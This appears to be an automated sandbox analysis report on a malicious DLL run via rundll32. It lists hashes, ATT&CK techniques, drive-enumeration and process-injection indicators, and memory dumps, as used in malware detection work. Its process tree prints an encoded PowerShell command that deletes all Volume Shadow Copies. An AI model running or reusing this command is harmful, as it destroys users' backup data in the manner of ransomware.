d6a0b7812b3ee8fbf81d40db94094facc25645689f4109e5d7983e8cb49990ec

General

Target

d6a0b7812b3ee8fbf81d40db94094facc25645689f4109e5d7983e8cb49990ec.dll
Size

164KB
MD5

c37804708ee284575f87bd0e365be9d9
SHA1

7b8f73cd90e344db7a4697fb6731cd953b1dfe03
SHA256

d6a0b7812b3ee8fbf81d40db94094facc25645689f4109e5d7983e8cb49990ec
SHA512

f2cca7e4bad7d683d47e5fc7fabb79024a8d5932b2b0206b11e66a2cae52d4e50626d3f0494cc3709885e1e40985295dee0eb02e7e44e7dfbb3b6fa7b30e4427

Score

6^/10

Malware Config

Signatures

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

rundll32.exe

description	ioc	process
File opened (read-only)	\??\P:	rundll32.exe
File opened (read-only)	\??\R:	rundll32.exe
File opened (read-only)	\??\S:	rundll32.exe
File opened (read-only)	\??\X:	rundll32.exe
File opened (read-only)	\??\Z:	rundll32.exe
File opened (read-only)	\??\O:	rundll32.exe
File opened (read-only)	\??\H:	rundll32.exe
File opened (read-only)	\??\I:	rundll32.exe
File opened (read-only)	\??\J:	rundll32.exe
File opened (read-only)	\??\F:	rundll32.exe
File opened (read-only)	\??\E:	rundll32.exe
File opened (read-only)	\??\G:	rundll32.exe
File opened (read-only)	\??\K:	rundll32.exe
File opened (read-only)	\??\N:	rundll32.exe
File opened (read-only)	\??\Q:	rundll32.exe
File opened (read-only)	\??\V:	rundll32.exe
File opened (read-only)	\??\W:	rundll32.exe
File opened (read-only)	\??\B:	rundll32.exe
File opened (read-only)	\??\Y:	rundll32.exe
File opened (read-only)	\??\L:	rundll32.exe
File opened (read-only)	\??\M:	rundll32.exe
File opened (read-only)	\??\T:	rundll32.exe
File opened (read-only)	\??\U:	rundll32.exe
File opened (read-only)	\??\A:	rundll32.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

rundll32.exepowershell.exe

pid process

1632 rundll32.exe
268 powershell.exe

pid	process
1632	rundll32.exe
268	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	268	powershell.exe
Token: SeBackupPrivilege	804	vssvc.exe
Token: SeRestorePrivilege	804	vssvc.exe
Token: SeAuditPrivilege	804	vssvc.exe

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

rundll32.exerundll32.exe

description	pid	process	target process
PID 1292 wrote to memory of 1632	1292	rundll32.exe	rundll32.exe
PID 1292 wrote to memory of 1632	1292	rundll32.exe	rundll32.exe
PID 1292 wrote to memory of 1632	1292	rundll32.exe	rundll32.exe
PID 1292 wrote to memory of 1632	1292	rundll32.exe	rundll32.exe
PID 1292 wrote to memory of 1632	1292	rundll32.exe	rundll32.exe
PID 1292 wrote to memory of 1632	1292	rundll32.exe	rundll32.exe
PID 1292 wrote to memory of 1632	1292	rundll32.exe	rundll32.exe
PID 1632 wrote to memory of 268	1632	rundll32.exe	powershell.exe
PID 1632 wrote to memory of 268	1632	rundll32.exe	powershell.exe
PID 1632 wrote to memory of 268	1632	rundll32.exe	powershell.exe
PID 1632 wrote to memory of 268	1632	rundll32.exe	powershell.exe

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\d6a0b7812b3ee8fbf81d40db94094facc25645689f4109e5d7983e8cb49990ec.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:1292

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\d6a0b7812b3ee8fbf81d40db94094facc25645689f4109e5d7983e8cb49990ec.dll,#1
2⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:268

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:804

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/268-56-0x000007FEFB5B1000-0x000007FEFB5B3000-memory.dmp

Filesize
8KB

Download
memory/268-57-0x000007FEF2810000-0x000007FEF336D000-memory.dmp

Filesize
11.4MB

Download
memory/268-58-0x00000000028D0000-0x00000000028D2000-memory.dmp

Filesize
8KB

Download
memory/268-59-0x00000000028D2000-0x00000000028D4000-memory.dmp

Filesize
8KB

Download
memory/268-60-0x00000000028D4000-0x00000000028D7000-memory.dmp

Filesize
12KB

Download
memory/268-61-0x00000000028DB000-0x00000000028FA000-memory.dmp

Filesize
124KB

Download
memory/1632-55-0x0000000075AB1000-0x0000000075AB3000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads